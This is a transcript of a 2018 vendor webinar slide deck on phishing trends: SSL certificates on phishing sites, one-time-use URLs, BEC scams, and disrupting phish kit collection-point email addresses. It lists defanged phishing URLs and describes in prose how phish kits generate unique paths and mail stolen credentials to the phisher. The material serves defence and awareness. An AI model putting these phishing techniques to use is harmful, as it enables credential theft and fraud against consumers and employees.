The Top 3 Trends in Phishing Right Now · 3 What we’re talking about today Most common phishing...
Transcript of The Top 3 Trends in Phishing Right Now · 3 What we’re talking about today Most common phishing...
The Top 3 Trends in Phishing Right Now
Stefanie Ellis
Portfolio Marketing Manager
AntiFraud Services
MarkMonitor
2
What are the 2018 cybercrime trends?
3
What we’re talking about today
Most common phishing trends for 2018:
• SSL Certs used in phishing
• One-time use URLs
• BEC scams/spearphishing increasing
Proactive approach to disrupting a phisher’s business:
• Collection point emails address usage across multiple phish kits
Q&A
4
With the many data leaks of 2016 and 2017, sophisticated phishing and spear phishing attacks must be expected.
Vade Secure, https://www.vadesecure.com/en/cybersecurity-4-trends-watch-2018/
SSL Certs Used in Phishing
Trend #1
6
What is an SSL/TLS Cert?
• SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are the names for
technology used to encrypt a communication channel between a web server and a
browser
• Their purpose is to make sure transmitted data remains private, users are
protected and to serve as an industry standard
• SSL/TLS certs are purchased from a certificate authority (CA)
7
Types of certs
• Domain Validation (DV) validates that the applicant has control of the domain
• Organization Validated (OV) including validation of organization identity
• Extended Validation (EV) are the financial/ecommerce standard
https://www.digicert.com/news/choosing-an-ssl-tls-certificate/
8
What do consumers think of SSL Certs?
Responses from an informal poll question for non-industry folks:
“What does the padlock or the word “secure” mean in the address bar?”
• “I don’t know”
• “It means the website I’m visiting is secure”
• “It’s why there is an ‘s’ in https.”
False assumptions:
• The site is legitimate and secure
• Our communication with the website is secure/encrypted AND protected
• Only legitimate organizations can purchase an SSL Cert
9
SSL Certs do not protect against phishing
• Services like Let’s Encrypt and Comodo provide short term domain certs for FREE
• This lends legitimacy to websites for consumers
https://www.zscaler.com/blogs/research/february-2018-zscaler-ssl-threat-report
10
MarkMonitor detections
• Volume of MarkMonitor detected validated phishing sites with SSL Certs:
260% increase in 12 months
• In Fall 2017 MM added a new detection feed focused on new SSL/TLS certs
11
What is the impact?
• Increase in losses due to more victims
• Huge increase in certs and malicious domain registrations
• Impact corresponds to GDPR — measuring in relation to SSL may be difficult
• Distrust of SSL/TLS from consumers and/or increased awareness
One-Time Use URLs
Trend #2
13
What are one-time use URLs?
• Phishing sites that spawn multiple unique URLs intended for only one recipient,
or a “one-time use”
• All domains are legitimate, but have been compromised to host phishing content:
hxxp://connectedhomeltd.____/vendor/signin/83fbaa7453f3b02d65a6c6366278ff44/
hxxp://connectedhomeltd.____/vendor/signin/5cb97b2f907b49901cfbcc47daab75aa/
hxxp://connectedhomeltd.____/vendor/signin/bf7663dfc59c1cc4a1ffbf6029f9bed8/
hxxp://nelsonchiropracticclinic.____/nelsonchiropracticcenter.com/wp-admin/Cooom/44aba7cd8808626221dffc2d93697001/
hxxp://nelsonchiropracticclinic.____/nelsonchiropracticcenter.com/wp-admin/Cooom/4dc68f42734b4dc321a249084da3516d/
hxxp://nelsonchiropracticclinic.____/nelsonchiropracticcenter.com/wp-admin/Cooom/44aba7cd8808626221dffc2d93697001/
hxxps://centralwavex.____/UKBUSSINESFORUM01/Ad/Ad/ad/6c57a1f1da9afa706e4722d76a0c9dac/
hxxp://centralwavex.____/UKBUSSINESFORUM01/Ad/Ad/ad/5c9c4f60b330bf585980d616aa5d8642/
hxxps://centralwavex.____/UKBUSSINESFORUM01/Ad/Ad/ad/ec099490c2a65be6fbbb4529aac7f75c/
14
How does it work?
The root of the phishing site auto-generates a unique path for each visitor:
• Line 22 is the name of the source folder:
“$src=“ok”
• Line 23 copies the “ok” folder into a randomly
named folder
• Line 24 redirects the visitors to the new
folder/site
15
How does this affect compliance?
• Going to the root phishing site will generate a new URL, so proof shouldn’t be too
much of a challenge
• Enforcement will need to go to the host for the source folder and will knock out all
unique URLs
• Clustering reduces shutdown effort; however, at MarkMonitor, each URL is
Fraudcasted for consumer blocking
16
URL vs. Domain Detections
0
10000
20000
30000
40000
50000
60000
URLs vs Domains
ALL Detecions Unique Domains Linear (ALL Detecions) Linear (Unique Domains)
17
What is the impact?
• Another obfuscation technique by phishers
• An indication of increased sophistication
• Makes compliance more challenging – but not impossible
• At MarkMonitor:
• All URLs are logged for Fraudcasting for consumer blocking
• Shutdowns are at the domain level to cluster mitigation efforts
BEC/Spearphishing Scams
Trend #3
19
What are BEC/EAC/employee spearphishing scams?
• Business Email Compromise (BEC), and Email Account Compromise (EAC) scams
often target businesses who perform wire transfers.
• Also known as Executive Impersonation: False executive requests non-legitimate wire
transfer as direct spearphishing attempt on an employee.
• HR/Payroll scams: Executive is impersonated for stealing employee tax records.
• IC3 reports that BEC/EAC type fraud can also include email-based scams related to
romance, lottery, employment, and rentals.
• Employment scams often relate to “money mule” jobs used in “laundering” money obtained
illegally, often through phishing sites.
20
BEC Scams/Employee spearphishing is NOT going away
• January 2015 to December 2016: 2,370% increase in identified, exposed losses
• Reported to IC3, October 2013 and December 2016:
• Domestic and international incidents: 40,203
• Domestic and international exposed dollar loss: $5,302,890,448
• The following BEC/EAC statistics were reported in victim complaints to the IC3 from October 2013 to December 2016:
• Total U.S. victims: 22,292
• Total U.S. exposed dollar loss: $1,594,503,669
https://www.ic3.gov/media/2017/170504.aspx
21
What is the impact?
• More data breaches
• Early awareness of lookalike domain registrations is helpful for email blocking or re-routing
• Employee education and awareness is paramount
• Additional checks and balances so that a single employee cannot initiate payable
changes or a wire transfer on their own
• Recommend hitting “forward” so the return email has to be typed in, rather than hitting
reply in case of a lookalike email address
Collection Points Email Addresses
Let’s be proactive!
23
Phish Kit harvesting make your organization a harder target
• Phish Kit fingerprinting categorizes kits into families and expedites future handling of similar phish
• Email collection point detection & mitigation can prevent access to stolen credentials
• Exploit detection can expedites takedowns and uncovers hidden data
24
What does it look like?
The collection point email address is embedded
in the phish kit:
• Line 29 has the email address
• Line 34 calls the mail function to send the
collected info to the phisher
• Upon success, line 37 redirects the visitor to
the legitimate site
25
Why is knowing the Collection Point address helpful?
• Shutting down the phisher’s collection point can
protect your consumer’s PII
• Collection points are often reused or used
concurrently across multiple phish kits
• It can also disrupt their other business interests;
some phishers use the email addresses for other
business correspondence
Summary
27
Takeaways
SSL Certs are can be misused
One-time use URLs prevalent
BEC scams not going away
Phish Kits & Collection Points are important
o Confusing to the consumer
o Could cause increased losses
o Unique URL volumes high, but unique domains mostly flat
o We’ll see an increase in unique domains following GDPR
o Enforcement is slightly more complicated, but compliance should be okay
o Targeted attacks are lucrative
o Employee education and internal processes are most important to make attacks ineffective
o Watch domain registrations
o Using phish kit collection to identify and shutdown collection points makes an organization a harder target
o Being proactive is the opposite of whack-a-mole
28
Mike Tyson has said, “Everybody has a plan until they get punched in the mouth.”
Q&A
Thank you!
Stefanie Ellis
Portfolio Marketing Manager
AntiFraud Services
MarkMonitor